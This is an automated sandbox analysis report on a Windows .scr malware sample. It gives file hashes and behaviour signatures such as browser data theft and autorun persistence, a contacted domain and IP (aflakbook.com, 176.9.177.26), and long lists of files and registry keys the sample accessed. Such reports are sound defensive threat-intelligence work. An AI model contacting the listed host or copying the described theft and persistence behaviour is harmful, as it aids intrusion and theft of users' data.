Flattr this analysis!

Tags: None

Analysis

Category Started Completed Duration
FILE 2014-05-03 09:09:10 2014-05-03 09:09:35 25 seconds

File Details

File Name report_7492740375439754.scr
File Size 19456 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 09cd9eb12effac3a5e9bcb83673d9807
SHA1 baad2cf8a7d25ffa752fccea7575b13009e19a12
SHA256 74f539fae25299555afbc1a090d639fe2eb5db123226cc4b39a27ae1e3a6278d
SHA512 8727344a5bde4e9d77bbbeda7c74a05c6e5dd99e67d89a047acbbdf6455cbd71f4426388cd242b95a89975729b0e0fd6b97c979f98ca5bd18874847dd3b23ae0
CRC32 8B8ED7A4
Ssdeep 192:gkNUhM5KAPWgLzfaWB27kOLd0R0XAsqSHrAdpA/4WBP82e1q92G:gkNDkPL40XAsBHrAdQ4WBP82wU2G
Yara None matched
You need to login

Signatures

Starts servers listening on 0.0.0.0:0
File has been identified by at least one AntiVirus on VirusTotal as malicious
Performs some HTTP requests
Steals private information from local Internet browsers
Creates an Alternate Data Stream (ADS)
file: C:\DosDevices\A:
file: C:\DosDevices\B:
file: C:\DosDevices\C:
Installs itself for autorun at Windows startup

Screenshots


Hosts

IP
176.9.177.26

Domains

Domain IP
aflakbook.com 176.9.177.26

Summary

C:\WINDOWS\system32\msctfime.ime
C:\WINDOWS\win.ini
C:\DOCUME~1\User\LOCALS~1\Temp\report_7492740375439754.scr
C:\DOCUME~1\User\LOCALS~1\Temp\smcos.exe
PIPE\wkssvc
IDE#CdRomVBOX_CD-ROM_____________________________1.0_____#42562d3231303037333036372020202020202020#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
MountPointManager
STORAGE#Volume#1&30a96598&0&Signature32B832B7Offset7E00Length27F4DB200#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
C:\Documents and Settings
C:\Documents and Settings\User
C:\Documents and Settings\User\My Documents
C:\Documents and Settings\User\My Documents\desktop.ini
C:\Documents and Settings\All Users
C:\Documents and Settings\All Users\Documents
C:\Documents and Settings\All Users\Documents\desktop.ini
C:\Documents and Settings\User\Desktop
C:\Documents and Settings\All Users\Desktop
C:\PROGRA~1\MICROS~2\Office12\GRA8E1~1.DLL
C:\WINDOWS\Registration\R000000000007.clb
c:\docume~1\user\locals~1\temp\smcos.exe
C:\DOCUME~1
C:\DOCUME~1\User
C:\DOCUME~1\User\LOCALS~1
C:\DOCUME~1\User\LOCALS~1\Temp
C:\Documents and Settings\User\Local Settings\Temporary Internet Files
C:\Documents and Settings\User\Local Settings\History
C:\Documents and Settings\User\Local Settings\Temporary Internet Files\Content.IE5\
C:\
C:\Documents and Settings\User\Local Settings\Temporary Internet Files\Content.IE5\index.dat
C:\Documents and Settings\User\Cookies\
C:\Documents and Settings\User\Cookies\index.dat
C:\Documents and Settings\User\Local Settings\History\History.IE5\
C:\Documents and Settings\User\Local Settings\History\History.IE5\index.dat
PIPE\lsarpc
c:\autoexec.bat
C:\Documents and Settings\User\Local Settings
C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Connections\Pbk\*.pbk
C:\WINDOWS\system32\Ras\*.pbk
C:\Documents and Settings\User\Application Data\Microsoft\Network\Connections\Pbk\*.pbk
C:\DOCUME~1\User\LOCALS~1\Temp\tmpie.exe
c:\docume~1\user\locals~1\temp\tmpie.exe
C:\WINDOWS\_default.pif
C:\DosDevices\A:
C:\DosDevices\B:
C:\MSDOS.SYS
C:\IO.SYS
C:\WINDOWS\system32\ntio.sys
C:\WINDOWS\system32\ntdos.sys
C:\WINDOWS\SYSTEM32\CONFIG.NT
C:\WINDOWS\TEMP\scs3.tmp
C:\WINDOWS\TEMP\SCS3.TMP
C:\WINDOWS\SYSTEM32\HIMEM.SYS
C:\WINDOWS\SYSTEM32\COUNTRY.SYS
C:\DosDevices\C:
C:\WINDOWS\SYSTEM32\COMMAND.COM
C:\WINDOWS\SYSTEM32
C:\WINDOWS\SYSTEM32\AUTOEXEC.NT
C:\WINDOWS\TEMP\scs4.tmp
C:\WINDOWS\TEMP\SCS4.TMP
C:\Documents and Settings\User\Application Data
C:\Program Files
C:\Program Files\Common Files
MSCDEXNT.EXE
C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
REDIR">>>
C:\WINDOWS\SYSTEM32\REDIR.EXE
DOSX">>>
C:\WINDOWS\SYSTEM32\DOSX.EXE
C:\WINDOWS\SYSTEM.INI
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\IMM
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
HKEY_CURRENT_USER\SOFTWARE\Microsoft\CTF
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\SystemShared
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\report_7492740375439754.scr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName
ActiveComputerName
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions
HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe
HKEY_CLASSES_ROOT\.exe
HKEY_CLASSES_ROOT\exefile
HKEY_CLASSES_ROOT\exefile\CurVer
HKEY_CLASSES_ROOT\exefile\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_CLASSES_ROOT\exefile\\ShellEx\IconHandler
HKEY_CLASSES_ROOT\SystemFileAssociations\.exe
HKEY_CLASSES_ROOT\SystemFileAssociations\application
HKEY_CLASSES_ROOT\exefile\\Clsid
HKEY_CLASSES_ROOT\*
HKEY_CLASSES_ROOT\*\Clsid
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{475c7950-e3d2-11e0-8d7a-806d6172696f}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{475c7952-e3d2-11e0-8d7a-806d6172696f}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{475c7952-e3d2-11e0-8d7a-806d6172696f}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{475c7950-e3d2-11e0-8d7a-806d6172696f}\
HKEY_CLASSES_ROOT\Directory
HKEY_CLASSES_ROOT\Directory\CurVer
HKEY_CLASSES_ROOT\Directory\
HKEY_CLASSES_ROOT\Directory\\ShellEx\IconHandler
HKEY_CLASSES_ROOT\Directory\\Clsid
HKEY_CLASSES_ROOT\Folder
HKEY_CLASSES_ROOT\Folder\Clsid
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
HKEY_CLASSES_ROOT\CLSID\{AEB6717E-7E19-11D0-97EE-00C04FD91972}\InProcServer32
HKEY_CLASSES_ROOT\CLSID\{B5A7F190-DDA6-4420-B3BA-52453494E6CD}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\AppCompatibility
HKEY_LOCAL_MACHINE\Software\Microsoft\COM3
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004_Classes
HKEY_LOCAL_MACHINE\Software\Classes
\REGISTRY\USER
HKEY_LOCAL_MACHINE\Software\Classes\CLSID
CLSID\{B5A7F190-DDA6-4420-B3BA-52453494E6CD}
CLSID\{B5A7F190-DDA6-4420-B3BA-52453494E6CD}\TreatAs
\CLSID\{B5A7F190-DDA6-4420-B3BA-52453494E6CD}
\CLSID\{B5A7F190-DDA6-4420-B3BA-52453494E6CD}\InprocServer32
\CLSID\{B5A7F190-DDA6-4420-B3BA-52453494E6CD}\InprocServerX86
\CLSID\{B5A7F190-DDA6-4420-B3BA-52453494E6CD}\LocalServer32
\CLSID\{B5A7F190-DDA6-4420-B3BA-52453494E6CD}\InprocHandler32
\CLSID\{B5A7F190-DDA6-4420-B3BA-52453494E6CD}\InprocHandlerX86
\CLSID\{B5A7F190-DDA6-4420-B3BA-52453494E6CD}\LocalServer
HKEY_CLASSES_ROOT\CLSID\{B5A7F190-DDA6-4420-B3BA-52453494E6CD}
HKEY_CLASSES_ROOT\CLSID\{B5A7F190-DDA6-4420-B3BA-52453494E6CD}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{B5A7F190-DDA6-4420-B3BA-52453494E6CD}
CLSID\{FA2FAAC1-9316-48F3-A294-121FEEA80CEC}
CLSID\{FA2FAAC1-9316-48F3-A294-121FEEA80CEC}\TreatAs
\CLSID\{FA2FAAC1-9316-48F3-A294-121FEEA80CEC}
\CLSID\{FA2FAAC1-9316-48F3-A294-121FEEA80CEC}\InprocServer32
\CLSID\{FA2FAAC1-9316-48F3-A294-121FEEA80CEC}\InprocServerX86
\CLSID\{FA2FAAC1-9316-48F3-A294-121FEEA80CEC}\LocalServer32
\CLSID\{FA2FAAC1-9316-48F3-A294-121FEEA80CEC}\InprocHandler32
\CLSID\{FA2FAAC1-9316-48F3-A294-121FEEA80CEC}\InprocHandlerX86
\CLSID\{FA2FAAC1-9316-48F3-A294-121FEEA80CEC}\LocalServer
HKEY_CLASSES_ROOT\CLSID\{FA2FAAC1-9316-48F3-A294-121FEEA80CEC}
HKEY_CLASSES_ROOT\CLSID\{FA2FAAC1-9316-48F3-A294-121FEEA80CEC}\TreatAs
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\12.0\Groove
HKEY_CURRENT_USER\SOFTWARE\Groove Networks, Inc.\Groove
HKEY_LOCAL_MACHINE\SOFTWARE\Groove Networks, Inc.\Groove
HKEY_LOCAL_MACHINE\SOFTWARE\Groove.OldData
HKEY_CURRENT_USER\SOFTWARE\Groove.OldData
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\12.0\Groove\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\12.0\Groove
CLSID\{71C3BF7F-682F-4B5E-9E47-5C25D3AC9458}
CLSID\{71C3BF7F-682F-4B5E-9E47-5C25D3AC9458}\TreatAs
\CLSID\{71C3BF7F-682F-4B5E-9E47-5C25D3AC9458}
\CLSID\{71C3BF7F-682F-4B5E-9E47-5C25D3AC9458}\InprocServer32
\CLSID\{71C3BF7F-682F-4B5E-9E47-5C25D3AC9458}\InprocServerX86
\CLSID\{71C3BF7F-682F-4B5E-9E47-5C25D3AC9458}\LocalServer32
\CLSID\{71C3BF7F-682F-4B5E-9E47-5C25D3AC9458}\InprocHandler32
\CLSID\{71C3BF7F-682F-4B5E-9E47-5C25D3AC9458}\InprocHandlerX86
\CLSID\{71C3BF7F-682F-4B5E-9E47-5C25D3AC9458}\LocalServer
HKEY_CLASSES_ROOT\CLSID\{71C3BF7F-682F-4B5E-9E47-5C25D3AC9458}
HKEY_CLASSES_ROOT\CLSID\{71C3BF7F-682F-4B5E-9E47-5C25D3AC9458}\TreatAs
CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}
CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}\TreatAs
\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}
\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}\InprocServer32
\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}\InprocServerX86
\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}\LocalServer32
\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}\InprocHandler32
\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}\InprocHandlerX86
\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}\LocalServer
HKEY_CLASSES_ROOT\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}
HKEY_CLASSES_ROOT\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}\TreatAs
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CLASSES_ROOT\.ade
HKEY_CLASSES_ROOT\.adp
HKEY_CLASSES_ROOT\.app
HKEY_CLASSES_ROOT\.asp
HKEY_CLASSES_ROOT\.bas
HKEY_CLASSES_ROOT\.bat
HKEY_CLASSES_ROOT\.cer
HKEY_CLASSES_ROOT\.chm
HKEY_CLASSES_ROOT\.cmd
HKEY_CLASSES_ROOT\.com
HKEY_CLASSES_ROOT\.cpl
HKEY_CLASSES_ROOT\.crt
HKEY_CLASSES_ROOT\.csh
CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}
CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\TreatAs
\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}
\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\InprocServer32
\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\InprocServerX86
\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\LocalServer32
\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\InprocHandler32
\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\InprocHandlerX86
\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\LocalServer
HKEY_CLASSES_ROOT\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}
HKEY_CLASSES_ROOT\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\TreatAs
HKEY_CLASSES_ROOT\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\InProcServer32
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\Ranges\
HKEY_LOCAL_MACHINE\System\Setup
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\C\
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\*\
HKEY_CURRENT_USER\SOFTWARE\Classes\PROTOCOLS\Handler\C
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\C
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESPECT_OBJECTSAFETY_POLICY_KB905547
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
HKEY_CLASSES_ROOT\exefile\\shell\open
HKEY_CLASSES_ROOT\exefile\\shell\open\command
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\smcos.exe
HKEY_CLASSES_ROOT\exefile\\shell\open\ddeexec
HKEY_CLASSES_ROOT\Applications\smcos.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Path1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Path2
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Path3
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Path4
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Special Paths
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013041020130411
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_AUTOPROXY_CACHE_ANAME_KB921400
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_TEMPORARYFILES_FOR_NOCACHE_840387
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_TEMPORARYFILES_FOR_NOCACHE_840386
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CHUNK_TIMEOUT_KB914453
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CERT_TRUST_VERIFIED_KB936882
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BUFFERBREAKING_818408
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENSURE_FQDN_FOR_NEGOTIATE_KB899417
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_DISABLE_NTLM_PREAUTH_IF_ABORTED_KB902409
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WPAD_STORE_URL_AS_FQDN_KB903926
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_KEEP_CACHE_INDEX_OPEN_KB899342
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WAIT_TIME_THREAD_TERMINATE_KB886801
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Http Filters\RPA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Http Filters\RPA
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked\FEATURE_INCLUDE_PORT_IN_SPN_KB908209
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing
HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\RASAPI32
HKEY_USERS\Software\Microsoft\windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Environment
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Volatile Environment
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_USERS\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_VALIDATE_URLHOSTNAME
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\Domains\aflakbook.com
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\aflakbook.com
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProtocolDefaults\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\smcos.exe
